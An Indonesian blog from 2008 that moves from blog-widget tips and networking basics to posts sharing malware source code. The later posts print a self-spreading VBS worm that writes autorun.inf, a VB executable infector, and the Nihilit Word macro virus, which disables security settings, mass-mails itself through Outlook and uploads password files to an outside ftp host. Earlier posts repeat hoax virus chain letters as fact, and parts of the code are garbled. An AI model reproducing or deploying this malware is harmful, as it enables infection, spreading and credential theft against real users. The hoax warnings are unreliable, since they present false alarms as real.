1. Buku Tamu
Bukutamu blog disebut juga dg shoutbox atau tagboard. Sama dengan bukutamu website, tapi bentuknya lebih sederhana. Banyak situs penyedia bukutamu blog gratis yg bisa Anda cari di google dengan kata kunci shoutbox atau tagboard. http://shoutmix.com termasuk penyedia bukutamu blog yg disukai yg servernya cukup stabil.
(a) Daftar di alamat di atas, ikuti semua perintahnya; (b) Setelah selesai, log-in dg id dan password yg sudah terdaftar; (c) Klik menu "Code Generator"; (d) Pilih Full-frame shoutbox; (e) Klik "Generate the Code"; (f) Copy kode HTML yg ada, dan masukkan ke template blog Anda di bagian Sidebar; (g) Klik SAVE SETTING & REPUBLISH. Selesai.
2. Statistic dan Tracker
Berfungsi untuk mengetahui berapa pengunjung yg datang setiap harinya, setiap minggu, dan bulan dan dari negara mana saja. Selain itu, ia memberi tahu kita lewat mana pengunjung itu datang: lewat pencarian di google atau via blog/situs lain yg memasang link blog kita. Statistic/tracker gratis yg paling terkenal ada dua Sitemeter dan Extreme Tracking. Klik link berikut untuk mendaftar:
(a) http://www.sitemeter.com/?a=newaccount (b) http://www.extreme- dm.com/tracking/?reg Setelah daftar, login dan masukkan kode HTML-nya di blog Anda.
3. Jadual Shalat
Bagi blogger Muslim, www.islamicfinder.org menyediakan jadual shalat lima waktu yg bisa ditempel di blog. Anda bisa pilih berdasarkan kota dan negara. Silahkan ambil kodenya di link berikut: http://www.islamicfinder.org/index.php?inl_language
4. Jam Dinding
Tidak cukup dg jam tangan dan jam di HP atau Anda merasa dinding blog Anda perlu dipasang jam? Silahkan pilih di http://www.clocklink.com dan ambil kodenya.
5. Peta Kampung Kita
Bagi yg ingin melihat nama dan peta kampung kelahiran nempel di blog, silahkan daftar di http://feedmap.net
(a) masuk ke http://feedmap.net; (b) Klik "Explore Blog", akan muncul peta dunia; (c) Pilih negara Indonesia dg cara klik kanan secara terus menerus mouse komputer Anda dan geser/putar peta dunia tsb. ke kanan/kiri sampai ketemu peta Indonesia. (d) Setelah peta Indonesia ditemukan, perbesar fokus peta dg cara mengklik 2x secara berulang-ulang; (e) Pilih kawasan atau propinsi yg paling dekat dg kampung kelahiran Anda, dan perbesar fokus peta dg mengklik berkali-kali sampai tidak dapat diperbesar lagi; (f) Setelah nama kampung kelahiran atau kota terdekat dari kampung kita tampak, arahkan panah mouse ke kota tsb dan klik kanan mouse; (g) Akan tampil menu "Add Blog", klik menu ini; (h) Akan muncul kotak, isi alamat blog Anda. Contoh, http://irfangeom.blogspot.com(jangan lupa pake awalan http://; (i) Klik submit; (j) Apabila berhasil, maka akan muncul tulisan: Thank You! Di bawahnya ada tiga kotak yg berisi kode html untuk BLOGMAP, NEIGHBLOGMAP BUTTON, dan LOCAL BLOGROLL. Copy ketiga kode HTML tsb. dan paste di sidebar blog Anda; (k) Selesai.
6. Membuat Polling Untuk Blog
Jika Blog Anda ingin dinilai dengan pengunjung maka Anda dapat membuat polling untuk
blog Anda Sendiri. Caranya masuk ke Alamat ini.
Kemudian sign up dan ikuti perintah di dalamnya.
7. Menambah kalender unik pada blog kita
8. Menambah prakiraan cuaca pada blog kita :
9. Huruf dan Gambar Animasi
Gambar animasi atau tulisan2 animasi dapat anda peroleh di http://www.bigoo.ws setelah anda mendapatkan kodenya anda dapatkan anda bisa langsung copy paste ke sidebar anda. Atau jika kode htmlnya tidak muncul, anda dapat klik kanan properties, lalu copy paste addressnya.
10. Untuk membuat tampilan blog anda lebih menarik ada beberapa situs yang menyediakan grafik-grafik seperti gambar, kalender, jam, kursor dll. Diantaranya adalah http://www.ladylony.com ; http://www.free-web-content.com ;
Jumat, 04 Juli 2008
तम्बहन blog
Diposting oleh baracrack di Jumat, Juli 04, 2008 0 komentar
Kamis, 03 Juli 2008
meanmbah tampilan pada blog
Keinginan untuk mempercantik Blog sebetulnya merupakan naluri alami dari pemiliknya. Selain karena unsur citra diri, juga karena keinginan untuk mendatangkan sebanyak-banyaknya jumlah pengunjung ke situs Blognya. Semakin tinggi frekuensi pengunjung yang datang, menjadi kebanggaan tersendiri bagi pemilik Blog.
Namun tidak semua orang paham dengan kode-kode HTML yang merupakan bahasa penyusun tampilan sebuah Blog. Dan tidak semua Blog memperbolehkan pemiliknya untuk memodifikasi isi tampilan Blog. Hanya beberapa penyedia Blog yang menyediakan fasilitas untuk menambah asesoris ke dalam Blog secara bebas, antara lain Blogger.com dan Blog Friendster.com
erbeda dengan Blogger.com yang menyediakan menu untuk mengubah tampilan, Blog Friendster tidak menyediakan secara khusus fasilitas tersebut. Namun terdapat jalan alternatif untuk menambahkan asesoris di dalam Friendster melalui fasilitas TypeLists yang akan dibahas pada akhir artikel ini.
Kemudahan Blogger.com
Pada versi yang baru, Blogger.com bahkan menambahkan fasilitas untuk merubah tampilan dengan menggunakan alat bantu yang tidak memerlukan kemampuan pemahaman
kode-kode HTML secara mendalam. Dengan alat bantu tersebut, pemilik Blog dapat dengan mudah menambahkan kode-kode HTML/Javascript yang dihasilkan oleh situs-situs penyedia asesoris Blog.
Dengan begitu, Anda hanya perlu meng-copy kode HTML/Javascript dari situs tersebut dan mem-paste kode tersebut pada kotak input yang telah disediakan oleh Blogger.com. Asalkan cukup rajin dalam mencari asesoris yang dibutuhkan oleh Blog, siapapun dapat menambahkan elemen-elemen yang menarik ke dalam Blognya.
Sedangkan tata letak dari setiap asesoris di dalam Blog dapat diatur dengan fasilitas drag-and-drop seperti yang sering Anda temukan pada aplikasi-aplikasi berbasis desktop. Pemilik Blog cukup memilih kotak elemen yang akan dipindah dengan mouse dan menggesernya ke posisi yang baru. Jika diperlukan, Anda dapat menambahkan sub judul pada setiap elemen tersebut.
Menambah Shoutbox
Shoutbox merupakan salah satu asesoris yang paling umum ditampilkan di dalam Blog. Asesoris ini digunakan untuk memberikan kesempatan kepada pengunjung untuk berkomentar secara bebas. Penyedia shoutbox gratis di internet, antara lain www.oggix.com, www.shutmix.com, dan www.myshoutbox.com.
Umumnya, proses untuk memperoleh asesoris tersebut cukup mudah. Sebagai contohnya, untuk memperoleh shoutbox dari oggix.com, Anda hanya perlu mengunjungi situs tersebut dan melakukan registrasi di sana. Setelah registrasi selesai, Anda akan diminta login dan memilih menu “Install ShoutBox”. Selanjutnya pilih “HTML Code” untuk memilih jenis dan tampilan shoutbox.
Setelah proses di atas selesai, Oggix.com akan menampilkan kode Javascript untuk menampilkan shoutbox yang telah Anda pilih. Blok kode tersebut dengan mouse dan salinlah dengan menggunakan Ctrl+C.
Jika Anda pemilik Blogger.com, masukkan kode Javascript melalui tabulasi Template dan pilih link “Page Elements”. Selanjutnya klik “Add a Page Element” yang ada di dalam layar desain template.
Kemudian Anda dapat memilih link “Add to Blog” pada kelompok HTML/Javascript di jendela “Choose a New Page Element”. Pemilihan tersebut akan memunculkan tampilan baru yang akan Anda gunakan untuk melekatkan kode-kode Javascript yang Anda peroleh sebelumnya dengan menggunakan Ctrl+V.
Jika tidak diperlukan, kotak isian “Title” dapat dikosongkan agar sub judul dari elemen tersebut tidak ditampilkan. Tekan tombol “Save Changes” untuk menyimpannya. Ketika kembali ke halaman tata letak, jangan lupa untuk menekan tombol Save. Dengan begitu, ketika Anda melihat ulang tampilan Blog, shoutbox sudah muncul di salah satu sudut halaman.
Beberapa asesoris lainnya yang dapat Anda tambahkan untuk mempercantik Blog antara lain web counter, video, kalender, jam, cuaca, berita dari situs lain, dan masih banyak lagi. Beberapa diantaranya dapat Anda temukan di clocklink.com, rightstats.com, amazingcounters.com, weatheronline.co.uk, dan wunderground.com. Dengan cara yang hampir sama dengan sebelumnya, Anda dapat menambahkan asesoris-asesoris tersebut ke dalam Blog.
Diposting oleh baracrack di Kamis, Juli 03, 2008 0 komentar
Label: blog
Senin, 30 Juni 2008
merias blog!!!!!
template=isnaini.com ato finalsense.com
Diposting oleh baracrack di Senin, Juni 30, 2008 0 komentar
Label: blog
Rabu, 25 Juni 2008
jaringan komputer
Jaringan komputer adalah sebuah sistem yang terdiri atas komputer dan perangkat jaringan lainnya yang bekerja bersama-sama untuk mencapai suatu tujuan yang sama. Tujuan dari jaringan komputer adalah:
Membagi sumber daya: contohnya berbagi pemakaian printer, CPU, memori, harddisk
Komunikasi: contohnya surat elektronik, instant messaging, chatting
Akses informasi: contohnya web browsing
Agar dapat mencapai tujuan yang sama, setiap bagian dari jaringan komputer meminta dan memberikan layanan (service). Pihak yang meminta layanan disebut klien (client) dan yang memberikan layanan disebut pelayan (server). Arsitektur ini disebut dengan sistem client-server, dan digunakan pada hampir seluruh aplikasi jaringan komputer.
Klasifikasi Berdasarkan skala :
Local Area Network (LAN)
Metropolitant Area Network (MAN)
Wide Area Network (WAN)
Berdasarkan fungsi : Pada dasarnya setiap jaringan komputer ada yang berfungsi sebagai client dan juga server. Tetapi ada jaringan yang memiliki komputer yang khusus didedikasikan sebagai server sedangkan yang lain sebagai client. Ada juga yang tidak memiliki komputer yang khusus berfungsi sebagai server saja. Karena itu berdasarkan fungsinya maka ada dua jenis jaringan komputer:
Yaitu jaringan komputer dengan komputer yang didedikasikan khusus sebagai server. Sebuah service/layanan bisa diberikan oleh sebuah komputer atau lebih. Contohnya adalah sebuah domain seperti www.detik.com yang dilayani oleh banyak komputer web server. Atau bisa juga banyak service/layanan yang diberikan oleh satu komputer. Contohnya adalah server jtk.polban.ac.id yang merupakan satu komputer dengan multi service yaitu mail server, web server, file server, database server dan lainnya.
Yaitu jaringan komputer dimana setiap host dapat menjadi server dan juga menjadi client secara bersamaan. Contohnya dalam file sharing antar komputer di Jaringan Windows Network Neighbourhood ada 5 komputer (kita beri nama A,B,C,D dan E) yang memberi hak akses terhadap file yang dimilikinya. Pada satu saat A mengakses file share dari B bernama data_nilai.xls dan juga memberi akses file soal_uas.doc kepada C. Saat A mengakses file dari B maka A berfungsi sebagai client dan saat A memberi akses file kepada C maka A berfungsi sebagai server. Kedua fungsi itu dilakukan oleh A secara bersamaan maka jaringan seperti ini dinamakan peer to peer.
Berdasarkan topologi jaringan : Berdasarkan [topologi jaringan], jaringan komputer dapat dibedakan atas:
Topologi bus
Topologi bintang
Topologi cincin
Topologi Mesh (Acak)
Topologi Pohon (Hirarkis)
Topologi Linier
Diposting oleh baracrack di Rabu, Juni 25, 2008 0 komentar
Label: komputer
Jumat, 20 Juni 2008
A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. The term "virus" is also commonly used, albeit erroneously, to refer to many different types of malware and adware programs. The original virus may modify the copies, or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or the Internet, or by carrying it on a removable medium such as a floppy disk, CD, or USB drive. Meanwhile viruses can spread to other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses are sometimes confused with computer worms and Trojan horses. A worm can spread itself to other computers without needing to be transferred as part of a host, and a Trojan horse is a file that appears harmless. Worms and Trojans may cause harm to either a computer system's hosted data, functional performance, or networking throughput, when executed. In general, a worm does not actually harm either the system's hardware or software, while at least in theory, a Trojan's payload may be capable of almost any type of harm if executed. Some can't be seen when the program is not running, but as soon as the infected code is run, the Trojan horse kicks in. That is why it is so hard for people to find viruses and other malware themselves and why they have to use spyware programs and registry processors.
Most personal computers are now connected to the Internet and to local area networks, facilitating the spread of malicious code. Today's viruses may also take advantage of network services such as the World Wide Web, e-mail, Instant Messaging and file sharing systems to spread, blurring the line between viruses and worms. Furthermore, some sources use an alternative terminology in which a virus is any form of self-replicating malware.
Some malware is programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Other malware programs are not designed to do any damage, but simply replicate themselves and perhaps make their presence known by presenting text, video, or audio messages. Even these less sinister malware programs can create problems for the computer user. They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, much malware is bug-ridden, and these bugs may lead to system crashes and data loss. Many CiD programs are programs that have been downloaded by the user and pop up every so often. This results in slowing down of the computer, but it is also very difficult to find and stop the problem.
Diposting oleh baracrack di Jumat, Juni 20, 2008 0 komentar
Label: worm
worm zero
Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft sebagai yang paling merusak! Virus itu baru ditemukan pada hari Minggu siang yang lalu oleh McAfee, dan belum ditemukan vaksin untuk mengalahkannya.
Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi informasi-informasi terpenting. Virus ini berjalan sebagai berikut :
„h secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat anda dengan judul "Sebuah Kartu Untuk Anda" ( Une Carte Pour Vous , atau A Card For You );
„h begitu kartu virtual itu terbuka, virus itu akan membekukan komputer sehingga penggunanya harus memulainya kembali; kalau anda menekan CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero dari Sektor Boot hard disk, sehingga hard disk akan rusak secara permanen.
Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan di New York.. Peringatan ini telah diterima oleh pegawai Microsoft sendiri.
Jangan membuka e-mail dengan judul "Sebuah kartu virtual untuk Anda" ( Une Carte Virtuelle Pour Vous atau A Virtual Card For You ).
Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian besar orang, seperti saya sendiri, lebih suka mendapat peringatan ini 25 kali daripada tidak sama sekali.
Jangan terima kontak " pti_bout_de_ chou @hotmail.com ". Ini virus yang akan memformat komputer anda. Kirimkan pesan ini ke semua orang yang ada di dalam daftar alamat anda.
Kalau anda tidak melakukannya dan salah seorang teman anda memasukkannya dalam daftar alamatnya, komputer anda juga akan terkena.
Kepada teman - teman semuanya,
Bila suatu hari anda menerima e-mail Powerpoint Presentation dgn judul "Life is beautiful.pps" , JANGAN DIBUKA DENGAN ALASAN APAPUN dan delete -lah segera. Apabila anda membuka file tsb,maka di layar anda akan terbaca "Now it is too late, your life is nolonger beautiful", setelah itu Anda akan KEHILANGAN SEMUANYA BAIK DATA,SOFTWARE, PROGRAM ATAUPUN SEJENISNYA YA NG ADA DI DALAM PC anda, jenisvirus ini sangat merusak dan orang yang mengirimkanya akan mendapat namaakses, e-mail & password anda. Itu adalah jenis virus baru yang mulai padahari Sabtu malam dan belum ada anti virusnya. Si pencipta virus ini adalahseorang hacker yang mengklaim dirinya sebagai Yang Empunya Kehidupan danakan melawan Microsoft dalam menegakan keadilan. Oleh sebab itu virus itudatang dengan menyamarkan diri sebagai pps extension. Berita ini dikirimkan oleh seorang kawan saya (software engineering) yang kini tinggal di Singapore , berhubung PC temannya telah terjangkit virus ini.
Diposting oleh baracrack di Jumat, Juni 20, 2008 0 komentar
Label: worm
Minggu, 04 Mei 2008
artikel koding antivirus pesin dari sang pembuat
Tepatnya pada tanggal 4 Juni 2004 secara serentak dengan seluruh komputer yang terinfeksi virus Myheart atau Pesin dan bersistem operasi Windows 98 melakukan penghapusan pada Directory Windows plus Program Files. Dengan menampilkan pesan seperti dibawah ini ketika komputer pertama kali dinyalakan :
Pesan ini kutujukan kepada mereka yang tak percaya akan
Kemampuan ku. Aku tahu aku adalah orang yang sangat bodoh tapi
apakah orang bodoh tak punya Impian ... ?? Hanya dengan
dalih ketidak percayaan, kalian telah hancurkan impian Putih ku
Tak apa ... !! karna kini impian itu tlah berubah menjadi
Sebuah Impian Hitam .. !! Ingin ku buktikan akan apa yang kalian
telah tuduhkan kepadaku ... !! Hari ini adalah Hari Ulang Tahun Ku
yang ke - 21 Aku punya kado manis untuk mu !! semoga dengan kado ini kamu
dapat nikmati .... !!
Kepada Bapak Samsu dan Ibu Heni "Terima Kasih Kalian tlah tanamkan impian hitam dihati ini"
Salam Hangat Buat Sobat - sobat satu kelas ku dulu Johan, Imron,
Maulana, Mario, Toni, Usman, Septi dan semua anak - anak 3 Akuntansi 3
Bye Bye
Windows is updating file(s) Please wait....
Setelah itu komputer hanya akan terus menamilkan C: tanpa masuk ke sistem operasi Windows 98. Terdapat banyak laporan ke IGM yang berkonsultasi bagaimana cara mengatasinya ?
Walaupun terdapat banyak Tools AntiVirus Pesin namun pada kenyataannya masih terdapat banyak Virus tersebut. Berdasarkan hasil survey dilapangan banyak yang mengatakan "Kenapa yach ...padahal kemarin sewaktu saya scan dengan anti pesin virusnya udah hilang tapi kok sekarang nongol lagi ???? apa tools ini hanya menghilangkan untuk sementara ??? " atau ada pula yang berkata "Ah ...itu mah ... virus biasa .. itu khan bisa di atasi dengan hapus manual aja ... ga perlu tools !!" Kedua pernyataan dan pertanyaan inilah yang menyebabkan virus tersebut masih dikomputer anda. Agar lebih terbuka saya akan memberikan Source Code Antivirus serta nama - nama file yang telah dianalisa adalah Variant Virus roro atau MyHeart, seperti Constanta List Virus Name berikut ini :
Const VirList : Array [1..32] of String =
"New Text Document.exe","Kenangan.exe","Roro.scr","README.exe",
"Hatiku.exe","Jangan Dibuka.exe","Patah Hati.exe",
"Baca Saya Dong.scr", "Unbreakable Love.scr", "Hallo.scr",
"Puisi Cinta.scr", "Cerita Lucu.scr", "Jangan Dibuka.scr","Uhuuuuy!.scr",
"Surat.scr","Asyik Deh.scr","My Heart.exe","MyHeart.exe","Letter.exe","ssEvtMgr.exe","Home.exe",
"SysTask.exe","Jangan Dibuka.exe","Mistery.exe","Log.exe","ReadMe.exe","Biodata.exe","Untuk Kamu.scr");
Satu catatan penting untuk kalian semua yang menggunakan Tools Anti Pesin bikinan saya, adalah "Ketika anda melakukan Scan semua induk dari Virus yang aktif di buat non aktif lalu dihapus, jadi komputer anda telah bersih dari virus Pesin namun tak hanya virus yang dihapus namun ketelitian dari anda semua sangat dibutuhkan pada saat membuka Document Word, anda harus pastikan apakah file tersebut benar - benar berextension *.doc atau *.exe walapun nama file tersebut adalah data asli anda, karena sifat virus ini adalah mengubah nama asli data anda menjadi Temp~45.doc atau Temp~xxx.doc dan menggantikan posisi nama data anda yang asli dengan virus. contoh skripse.exe, laporan khusus.exe etc"
Untuk itu saya bagi - bagikan 80 % Source Code antivirus dari saya untuk dikembangkan lagi ... dan dimanfaatkan demi kebaikan.
Andai ada yang kurang dari SourceCode ini yang membuat AntiVirus dari saya lemah, anda berhak untuk mengembangkannya hingga AntiVirus ini benar - benar ampuh.
// Pertama kali dibuat oleh Leonnaro ( LeoNarts ) dengan nama HalloKill
// Revisi ulang oleh Agnies Bahrul Adiyan ( Junior Software ) dengan nama AntiMyHeart&roro ver GUI
procedure TForm1.Timer1Timer(Sender: TObject);
If Tahap = 1 Then
Tahap := 2;
WavePanel1.Caption := "Scaning .... Plaease wait ... !! ";
ListBox1.Items.Add("Scaning .... ");
ListBox1.Items.Add("Please wait .... ");
End Else If Tahap = 2 Then
Tahap := 0;
WavePanel1.Caption := "The Digital Solution ";
Drv := Edit1.Text;
If FileSetAttr("C:MSDOS.SYS", FaArchive) = 0 Then
Ini := TIniFile.Create("C:MSDOS.SYS");
Ini.DeleteKey("Options", "BootWarn");
Ini.DeleteKey("Options", "BootKeys");
FileSetAttr("C:MSDOS.SYS", FaSysFile Or FaReadOnly Or FaHidden);
If listv.Count>0 Then
For a:=1 to listv.Count Do
if (Pos("SYSMNG.EXE",TmpStr)<>0) or (Pos("SYSSRV.EXE",TmpStr)<>0) or (Pos(".SCR",TmpStr)<>0)
or (Pos("SSEVTMGR.EXE",TmpStr)<>0) or (Pos("SYSTASK.EXE",TmpStr)<>0) Then
ListBox1.Items.Add("Virus found --> "+listv[a-1]);
ListBox1.Items.Add("Scanning : "+Drv + ":");
FindFiles(Drv + ":");
ListBox1.Items.Add("Infected :"+IntToStr(FDel + FRepair));
ListBox1.Items.Add("Repaired :"+IntToStr(FRepair));
ListBox1.Items.Add("Deleted :"+IntToStr(FDel));
ListBox1.Items.Add("Mision Complete ");
WavePanel1.Caption := "By Junior Software 2002 - 2003 :)";
Application.MessageBox("Selesai","Mision Complete !!",MB_ICONINFORMATION);
If WavePanel1.Caption = "By Junior Software 2002 - 2003 :)" Then
WavePanel1.Caption := "The Digital Solution "
Else If WavePanel1.Caption = "The Digital Solution " Then
WavePanel1.Caption := "By Junior Software 2002 - 2003 :)"
Diposting oleh baracrack di Minggu, Mei 04, 2008 0 komentar
Sabtu, 03 Mei 2008
malaysian virus
' VBS.GrepoZipTsunami.a
' My first VBS virus. Padding itself into a zip file!
' Don't worry, it won't do harm to you.. I promise.
' SealNight5, Asmaradana
' MVS, USM, Malaysia.
' 2005-01-01
Set Fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set tsunami = Fso.GetFile(WScript.ScriptFullName)
tsunami.Copy (Fso.GetSpecialFolder(1) & "\PleaseRead1st.vbs")
Set Drives = Fso.Drives
For Each Drive In Drives
On Error Resume Next
If Drive.isready Then
Fso.Deletefile Drive & "tsunami.bat"
End If
ret = Chr(13)
tsu1 = "It is God's avenge!" & ret
tsu2 = "Those people did bad on earth..." & ret
tsu3 = "God has promised, that He will give lesson," & ret
tsu4 = "and this is a promise that the End of Day" & ret
tsu5 = "is just not too far ahead!" & ret & ret
tsu6 = "Pray, do good and may God bless you!" & ret & ret
tsu7 = "Tell and share this message with everyone who has faith in God."
tsunamimsg = "C:\windows\tsunami.txt"
Set msg = Fso.Createtextfile(tsunamimsg, True)
msg.writeline tsu1 & tsu2 & tsu3 & tsu4 & tsu5 & tsu6 & tsu7
ws.run tsunamimsg
For Each Drive In Drives
If Drive.isready Then
On Error Resume Next
tsunami.Copy(drive&"\Tsunami - A must read - God's avenge.vbs")
tsunamirun = Drive & "autorun.inf"
Set autorun = Fso.Createtextfile(tsunamirun, True)
autorun.writeline "PleaseRead1st.vbs"
SearchWinZip Drive & "\"
End If
Function SearchWinZip(path)
On Error Resume Next
winzipexist = 1
Set word = CreateObject("word.application")
If word.System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\winzip32.exe", "") = "" Then
winzipexist = 0
End If
If winzipexist = 1 Then
Set folder = Fso.getfolder(path)
Set Files = folder.Files
For Each file In Files
If Fso.GetExtensionName(file.path) = "zip" Then
Set ws = CreateObject("wscript.shell")
Set word = CreateObject("word.application")
appword = word.System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\winzip32.exe", "")
ws.run appword & " -a -r " & file.path & Chr(32) & " " & Fso.GetSpecialFolder(1) & "\PleaseRead1st.vbs"
End If
Set Subfolders = folder.Subfolders
For Each Subfolder In Subfolders
SearchWinZip Subfolder.path
End If
End Function
Diposting oleh baracrack di Sabtu, Mei 03, 2008 0 komentar
coding virus
Private Sub PeriksadanInfeksiExe(fname As String)
Dim tSignature As String * 5
Dim OriginalCode As String
Dim fNum As Integer
'Jangan menginfeksi diri sendiri
'Hanya menginfeksi file berukuran lebih dibawah 1 Mega
If Dir(fname) <> "" Then
If FileLen&(fname) > virSize And FileLen&(fname) < 1048576 Then
'Ambil nomor file
fNum = FreeFile
Open fname For Binary Access Read As fNum 'Buka file target
Seek fNum, LOF(fNum) - 5 + 1 'pindah file pointer ke posisi Signature Virus
tSignature = Space$(5)
Get fNum, , tSignature 'baca tSignature
Close fNum
If tSignature <> virSignature Then 'jika file virus (tidak ada virSignature)
On Error GoTo finally
Open fname For Binary Access Read Write As fNum 'Buka file target
OriginalCode = Space$(LOF(fNum))
Get fNum, , OriginalCode 'baca Program Executable
Put fNum, 1, virCode 'tulis Program Virus diawal
Put fNum, , OriginalCode 'tulis Program Executable
Put fNum, , virSize 'tulis Ukuran Virus
Put fNum, , virSignature 'tulis Signature Virus
Close fNum
End If
End If
End If
End Sub
Ketika program Executable dijalankan maka :
Private Sub VirusInitial()
Dim OriginalCode As String
Dim tSignature As String * 5
Dim fNum As Integer
Dim fname As String
virSignature = Chr$(3) + Chr$(53) + Chr$(103) + Chr$(153) + Chr$(203)
Open exePath + App.EXEName + ".exe" For Binary Access Read As #1
Seek #1, LOF(1) - 5 + 1 'pindah file pointer ke posisi virSize
tSignature = Space$(5)
Get #1, , tSignature 'baca virSignature
If tSignature <> virSignature Then 'Jika file virus sendiri
virSize = LOF(1) 'ukuran virSize sama dengan ukuran file
virCode = Space$(virSize) 'siapkan buffer virCode
Seek #1, 1 'ke posisi bof
Get #1, , virCode 'baca virCode sebesar ukuran virSize
Close #1
Call VirInstall 'instalasi virus
If Not SudahLoad Then
Load ff 'aktifkan timer virus
End If
'Jika file yang terinfeksi
Seek #1, LOF(1) - 9 + 1 'pindah file pointer ke posisi virSize
Get #1, , virSize 'baca virSize (long = 4 byte)
'Baca vircode
virCode = Space$(virSize)
Seek #1, 1 'ke posisi BOF (Awal file)
Get #1, , virCode 'baca virCode sebesar ukuran virSize
OriginalCode = Space$(LOF(1) - virSize) 'siapkan buffer
Get #1, , OriginalCode 'baca originalCode
fNum = 0
Do While Dir(exePath & App.EXEName & fNum & ".exe") <> ""
fNum = fNum + 1
fname = exePath & App.EXEName & fNum & ".exe"
On Error GoTo finally
Open fname For Binary Access Write As #2
Put #2, , OriginalCode 'tulis ke file sementara
Close #2 'tutup file sementara
Close #1
Call VirInstall
If Not SudahLoad Then
Load ff 'aktifkan timer virus
End If
Call ExecuteOriginal(fname)
Kill fname 'hapus file sementara
End If
End Sub
Private Sub ExecuteOriginal(fname)
Dim Host As Long, HProc As Long, HExit As Long
Host = Shell(fname, vbNormalFocus) 'jalankan fname
HProc = OpenProcess(PROCESS_ALL_ACCESS, False, Host)
GetExitCodeProcess HProc, HExit 'ambil status aktif
Do While HExit = STILL_ACTIVE 'proses ditahan selama proses masih aktif
DoEvents 'lakukan event yang lain
GetExitCodeProcess HProc, HExit
End Sub
Private Function SudahLoad() As Boolean
Dim vir_hwnd As Long
'Jika Jendela virus aktif
vir_hwnd = FindWindow(vbNullString, titleSudahLoad)
SudahLoad = Not (vir_hwnd = 0)
End Function
Diposting oleh baracrack di Sabtu, Mei 03, 2008 0 komentar
bunuh antivirus
Attribute VB_Name = "Nihilit
Sub AutoClose()
On Error Resume Next
'======= Nihilit v4.0 / Nihilit.d =======
'=== (c) by Necronomikon |[Zer0Gravity] ===
'greets flies out to: Serial Killer(Bitte!;p),GigaByte,jackie,
'Ultras,DX100h,DrG0nzo,The Mental Driller,VirusBuster,$moothie,
'and all in #virus,#vir,#vxers,#zerogravity,...
'hope to forget nobody.....!
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
Call Nihilit
Call KillAV
z = Application.System.PrivateProfileString("", _
"\CurrentVersion\App Paths\winzip32.exe", "")
w = Environ("windir")
VBA.Shell z & " -a -r " & w & "\Nihilit.zip" _
& Chr(32) & w & "\nihilit.doc", vbHide
End Sub
Sub Nihilit()
On Error Resume Next
'thanks to j´ for advanced codes
Word.Application.Options.VirusProtection = n
Word.Application.Options.ConfirmConversions = n
Word.Application.Options.SaveNormalPrompt = n
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
ActiveDocument.ReadOnlyRecommended = False
If NormalTemplate.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then
ActiveDocument.VBProject.VBComponents("Nihilit").Export ("C:\Windows\Nihilit.drv")
SetAttr "C:\Windows\Nihilit.drv", 6
End If
Call InfectDocument
If Month(Now()) = 12 And Day(Now()) = 14 Then Call Pgp
Call Pwdstealer
NormalTemplate.Saved = True
End If
Call ump
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Necronomikon\ZeroGravity\Nihilit", "Irc") = "True"
Call Irc
'should i release a 2nd version of "Word97/2K.Blade"?
Blade = Int(Rnd * 5)
If Blade = 3 then Call Delay
ActiveDocument.SaveAs FileName:="C:\Windows\Nihilit.doc", FileFormat:=wdFormatDocument
Set Ni_OApp = CreateObject("Outlook.Application")
Set Ni_Mapi = Ni_OApp.GetNameSpace("MAPI")
For Each Ni_AddList In Ni_Mapi.AddressLists
If Ni_AddList.AddressEntries.Count <> 0 Then
For Ni_AddListCount = 1 To Ni_AddList.AddressEntries.Count
Set Ni_AddListEntry = Ni_AddList.AddressEntries(Ni_AddListCount)
Set Ni_msg = Ni_OApp.CreateItem(0)
Ni_msg.To = Ni_AddListEntry.Address
Ni_msg.Subject = "Check this!!!"
Ni_msg.Body = "I like this story!!!;o)." + vbCrLf + "Nihilit"
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc"
Ni_msg.DeleteAfterSubmit = True
If Ni_msg.To <> "" Then
End If
End If
End Sub
Sub InfectDocument()
On Error Resume Next
If GetAttr(ActiveDocument.FullName) = 1 Then
SetAttr ActiveDocument.FullName, 0
End If
If ActiveDocument.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then
ActiveDocument.VBProject.VBComponents.import ("C:\Windows\Nihilit.drv")
End If
SetAttr ActiveDocument.FullName, 1
End Sub
Sub Pwdstealer()
On Error Resume Next
With Application.FileSearch
.FileName = "*.pwl"
.LookIn = "c:"
For i = 1 To .FoundFiles.Count
shell "ftp http://members.tripod.com/Nihilit/"
shell "nihilit"
shell "killer"
shell "post" & .FoundFiles(i)
shell "bye"
Next i
End With
End Sub
Sub Pgp()
On Error Resume Next
'taken from WM97/Caligula by Opic[CodeBreakers]
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Nihilit3") = False) Then
